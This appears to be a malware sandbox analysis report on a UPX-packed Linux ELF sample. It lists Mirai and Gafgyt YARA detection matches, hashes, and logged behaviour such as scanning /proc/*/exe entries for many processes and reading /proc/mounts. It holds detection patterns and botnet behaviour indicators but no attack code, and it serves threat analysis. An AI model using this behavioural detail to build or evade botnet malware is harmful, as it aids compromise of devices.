Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: Process Memory Space: xd.x86.elf PID: 6239, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6239, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6241, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6241, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6242, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6242, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6243, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6243, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6246, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6246, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6247, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6247, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6249, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: xd.x86.elf PID: 6249, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: classification engine

Classification label: mal88.spre.troj.evad.linELF@0/16@3/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /bin/fusermount (PID: 6398)

File: /proc/6398/mounts

Jump to behavior

Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/6196/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2033/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4444/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4445/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/912/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4446/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/759/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/517/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4447/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/918/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/6240/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2285/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2281/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1349/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/761/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/884/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/884/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2038/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1465/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1586/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1463/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/800/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/801/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/801/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/3021/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/491/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2294/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/772/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1599/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/774/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1477/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/896/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1476/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1475/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2289/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/777/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/658/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/936/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/6407/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2208/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2180/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4481/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4486/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1494/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/420/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1489/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/785/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/667/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/788/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/789/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4477/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/670/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4490/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2746/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/793/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/674/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1532/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/675/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/796/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/796/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/676/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/797/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/677/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/799/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/799/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2749/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1389/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/840/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/720/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/721/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/847/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/847/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/6335/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2128/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2761/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2882/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/6448/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/6460/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/6187/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4442/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/4443/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1601/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2018/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/2014/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/1320/exe	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/904/fd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File opened: /proc/904/exe	Jump to behavior

Source: /usr/bin/gpu-manager (PID: 6358)	Shell command executed: sh -c "grep -G \"^blacklist.nvidia[[:space:]]$\" /etc/modprobe.d/*.conf"	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6360)	Shell command executed: sh -c "grep -G \"^blacklist.nvidia[[:space:]]$\" /lib/modprobe.d/*.conf"	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6362)	Shell command executed: sh -c "grep -G \"^blacklist.radeon[[:space:]]$\" /etc/modprobe.d/*.conf"	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6364)	Shell command executed: sh -c "grep -G \"^blacklist.radeon[[:space:]]$\" /lib/modprobe.d/*.conf"	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6366)	Shell command executed: sh -c "grep -G \"^blacklist.amdgpu[[:space:]]$\" /etc/modprobe.d/*.conf"	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6368)	Shell command executed: sh -c "grep -G \"^blacklist.amdgpu[[:space:]]$\" /lib/modprobe.d/*.conf"	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6370)	Shell command executed: sh -c "grep -G \"^blacklist.nouveau[[:space:]]$\" /etc/modprobe.d/*.conf"	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6372)	Shell command executed: sh -c "grep -G \"^blacklist.nouveau[[:space:]]$\" /lib/modprobe.d/*.conf"	Jump to behavior

Source: /bin/sh (PID: 6359)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.nvidia[[:space:]]$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf	Jump to behavior
Source: /bin/sh (PID: 6361)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.nvidia[[:space:]]$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf	Jump to behavior
Source: /bin/sh (PID: 6363)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.radeon[[:space:]]$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf	Jump to behavior
Source: /bin/sh (PID: 6365)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.radeon[[:space:]]$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf	Jump to behavior
Source: /bin/sh (PID: 6367)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.amdgpu[[:space:]]$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf	Jump to behavior
Source: /bin/sh (PID: 6369)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.amdgpu[[:space:]]$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf	Jump to behavior
